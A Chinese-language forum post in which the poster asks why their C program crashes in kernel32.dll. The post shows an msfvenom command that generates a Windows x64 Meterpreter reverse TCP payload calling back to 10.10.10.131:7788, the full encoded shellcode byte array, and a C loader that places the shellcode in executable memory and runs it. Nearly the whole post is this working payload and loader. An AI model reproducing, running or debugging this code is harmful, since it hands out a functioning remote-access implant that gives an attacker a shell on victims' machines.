kernel32.dll 0xC0000005: 执行位置 0x0000000076E3A404 时发生访问冲突

又是用 c 语言执行 shellcode 的问题。。
shellcode 是用 msfvenom 生成的 windows/x64/meterpreter/reverse_tcp 。注意是 x64 的。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.131 lport=7788 -b "\x00\x0a\x0d" --platform windows -f c
No Arch selected, selecting Arch: x86_64 from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x62\x68\x19\xad\x30\x9b\xd1\x92\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x9e\x20\x9a\x49\xc0\x73"
"\x1d\x92\x62\x68\x58\xfc\x71\xcb\x83\xc3\x34\x20\x28\x7f\x55"
"\xd3\x5a\xc0\x02\x20\x92\xff\x28\xd3\x5a\xc0\x42\x20\x92\xdf"
"\x60\xd3\xde\x25\x28\x22\x54\x9c\xf9\xd3\xe0\x52\xce\x54\x78"
"\xd1\x32\xb7\xf1\xd3\xa3\xa1\x14\xec\x31\x5a\x33\x7f\x30\x29"
"\x48\xe5\xbb\xc9\xf1\x19\x20\x54\x51\xac\xe0\xfd\x50\xea\x7a"
"\x63\x1b\xa2\xb5\xe9\xd1\x92\x62\xe3\x99\x25\x30\x9b\xd1\xda"
"\xe7\xa8\x6d\xca\x78\x9a\x01\xc2\xe9\x20\x01\xe9\xbb\xdb\xf1"
"\xdb\x63\xb8\xfa\xfb\x78\x64\x18\xd3\xe9\x5c\x91\xe5\x31\x4d"
"\x9c\xa3\xab\x20\x28\x6d\x9c\xda\x10\x5b\x6f\x29\x18\x6c\x08"
"\x7b\xa4\x63\x2e\x6b\x55\x89\x38\xde\xe8\x43\x17\xb0\x41\xe9"
"\xbb\xdb\xf5\xdb\x63\xb8\x7f\xec\xbb\x97\x99\xd6\xe9\x28\x05"
"\xe4\x31\x4b\x90\x19\x66\xe0\x51\xac\xe0\xda\x89\xd3\x3a\x36"
"\x40\xf7\x71\xc3\x90\xcb\x23\x32\x51\x2e\xdc\xbb\x90\xc0\x9d"
"\x88\x41\xec\x69\xc1\x99\x19\x70\x81\x52\x52\xcf\x64\x8c\xdb"
"\xdc\x1f\x6a\x9f\x6f\xa8\xe3\x92\x62\x29\x4f\xe4\xb9\x7d\x99"
"\x13\x8e\xc8\x18\xad\x30\xd2\x58\x77\x2b\xd4\x1b\xad\x2e\xf7"
"\xdb\x98\x68\xeb\x58\xf9\x79\x12\x35\xde\xeb\x99\x58\x17\x7c"
"\xec\xf7\x95\x9d\xbd\x55\x24\xda\xf3\xd0\x93\x62\x68\x40\xec"
"\x8a\xb2\x51\xf9\x62\x97\xcc\xc7\x35\xda\x8f\xc2\x32\x25\x28"
"\x64\x7d\xaa\x11\xda\x9d\xa8\x51\x24\xf2\xd3\x2e\x52\x2a\xe1"
"\xd8\xec\x8a\x71\xde\x4d\x82\x97\xcc\xe5\xb9\x5c\xbb\x82\x23"
"\x30\x55\x24\xd2\xd3\x58\x6b\x23\xd2\x80\x08\x44\xfa\x2e\x47"
"\xe7\xa8\x6d\xa7\x79\x64\x1f\xe7\x87\x80\x8a\xad\x30\x9b\x99"
"\x11\x8e\x78\x51\x24\xd2\xd6\xe0\x5b\x08\x6c\x58\xf5\x78\x12"
"\x28\xd3\xd8\x6a\xc0\x65\x6f\x64\x04\x11\x9a\x68\x67\xf8\x78"
"\x18\x15\xb2\x3c\xe1\xef\xc7\x70\xda\x88\xfa\x62\x78\x19\xad"
"\x71\xc3\x99\x1b\x90\x20\x28\x64\x71\x21\x89\x36\x31\x8d\xe6"
"\x78\x78\x12\x12\xdb\xeb\xaf\x54\x9c\xf9\xd2\x58\x62\x2a\xe1"
"\xc3\xe5\xb9\x62\x90\x28\x60\xb1\xd1\xf2\xcf\x4e\x52\x6a\x62"
"\x15\x31\xf5\x71\xcc\x88\xfa\x62\x28\x19\xad\x71\xc3\xbb\x92"
"\x38\x29\xa3\xa6\x1f\x94\xe1\x6d\xb7\x3f\x40\xec\x8a\xee\xbf"
"\xdf\x03\x97\xcc\xe4\xcf\x55\x38\xae\x9d\x97\xe6\xe5\x31\x58"
"\x99\xbb\xa4\x20\x9c\x5b\x45\x2f\x90\x6d\x85\x30\x73\xad\x69"
"\xd2\x16\x50\x92\xdd\xbb\xfb\xcf\x4e\xd1\x92";

c 语言代码：

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* run this program using the console pauser or add your own getch, system("pause") or input loop */

unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x62\x68\x19\xad\x30\x9b\xd1\x92\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x9e\x20\x9a\x49\xc0\x73"
"\x1d\x92\x62\x68\x58\xfc\x71\xcb\x83\xc3\x34\x20\x28\x7f\x55"
"\xd3\x5a\xc0\x02\x20\x92\xff\x28\xd3\x5a\xc0\x42\x20\x92\xdf"
"\x60\xd3\xde\x25\x28\x22\x54\x9c\xf9\xd3\xe0\x52\xce\x54\x78"
"\xd1\x32\xb7\xf1\xd3\xa3\xa1\x14\xec\x31\x5a\x33\x7f\x30\x29"
"\x48\xe5\xbb\xc9\xf1\x19\x20\x54\x51\xac\xe0\xfd\x50\xea\x7a"
"\x63\x1b\xa2\xb5\xe9\xd1\x92\x62\xe3\x99\x25\x30\x9b\xd1\xda"
"\xe7\xa8\x6d\xca\x78\x9a\x01\xc2\xe9\x20\x01\xe9\xbb\xdb\xf1"
"\xdb\x63\xb8\xfa\xfb\x78\x64\x18\xd3\xe9\x5c\x91\xe5\x31\x4d"
"\x9c\xa3\xab\x20\x28\x6d\x9c\xda\x10\x5b\x6f\x29\x18\x6c\x08"
"\x7b\xa4\x63\x2e\x6b\x55\x89\x38\xde\xe8\x43\x17\xb0\x41\xe9"
"\xbb\xdb\xf5\xdb\x63\xb8\x7f\xec\xbb\x97\x99\xd6\xe9\x28\x05"
"\xe4\x31\x4b\x90\x19\x66\xe0\x51\xac\xe0\xda\x89\xd3\x3a\x36"
"\x40\xf7\x71\xc3\x90\xcb\x23\x32\x51\x2e\xdc\xbb\x90\xc0\x9d"
"\x88\x41\xec\x69\xc1\x99\x19\x70\x81\x52\x52\xcf\x64\x8c\xdb"
"\xdc\x1f\x6a\x9f\x6f\xa8\xe3\x92\x62\x29\x4f\xe4\xb9\x7d\x99"
"\x13\x8e\xc8\x18\xad\x30\xd2\x58\x77\x2b\xd4\x1b\xad\x2e\xf7"
"\xdb\x98\x68\xeb\x58\xf9\x79\x12\x35\xde\xeb\x99\x58\x17\x7c"
"\xec\xf7\x95\x9d\xbd\x55\x24\xda\xf3\xd0\x93\x62\x68\x40\xec"
"\x8a\xb2\x51\xf9\x62\x97\xcc\xc7\x35\xda\x8f\xc2\x32\x25\x28"
"\x64\x7d\xaa\x11\xda\x9d\xa8\x51\x24\xf2\xd3\x2e\x52\x2a\xe1"
"\xd8\xec\x8a\x71\xde\x4d\x82\x97\xcc\xe5\xb9\x5c\xbb\x82\x23"
"\x30\x55\x24\xd2\xd3\x58\x6b\x23\xd2\x80\x08\x44\xfa\x2e\x47"
"\xe7\xa8\x6d\xa7\x79\x64\x1f\xe7\x87\x80\x8a\xad\x30\x9b\x99"
"\x11\x8e\x78\x51\x24\xd2\xd6\xe0\x5b\x08\x6c\x58\xf5\x78\x12"
"\x28\xd3\xd8\x6a\xc0\x65\x6f\x64\x04\x11\x9a\x68\x67\xf8\x78"
"\x18\x15\xb2\x3c\xe1\xef\xc7\x70\xda\x88\xfa\x62\x78\x19\xad"
"\x71\xc3\x99\x1b\x90\x20\x28\x64\x71\x21\x89\x36\x31\x8d\xe6"
"\x78\x78\x12\x12\xdb\xeb\xaf\x54\x9c\xf9\xd2\x58\x62\x2a\xe1"
"\xc3\xe5\xb9\x62\x90\x28\x60\xb1\xd1\xf2\xcf\x4e\x52\x6a\x62"
"\x15\x31\xf5\x71\xcc\x88\xfa\x62\x28\x19\xad\x71\xc3\xbb\x92"
"\x38\x29\xa3\xa6\x1f\x94\xe1\x6d\xb7\x3f\x40\xec\x8a\xee\xbf"
"\xdf\x03\x97\xcc\xe4\xcf\x55\x38\xae\x9d\x97\xe6\xe5\x31\x58"
"\x99\xbb\xa4\x20\x9c\x5b\x45\x2f\x90\x6d\x85\x30\x73\xad\x69"
"\xd2\x16\x50\x92\xdd\xbb\xfb\xcf\x4e\xd1\x92";


int main(void) {
	
    printf("Execute meterpreter shellcode.....\n");  
	PVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, buf, sizeof(buf));
	((void(*)())Memory)();  
}

然后在 vs2013 上将解决方案平台改为 x64 ，然后运行 debug ，开始是正常的，然后过了几秒，就出现

0x0000000076E3A404 （ kenerl32.dll ）(xxx.exe 中)处有未经处理的异常：
0xC0000005: 执行位置 0x0000000076E3A404 时发生访问冲突

请问这改如何解决？谢谢各位大神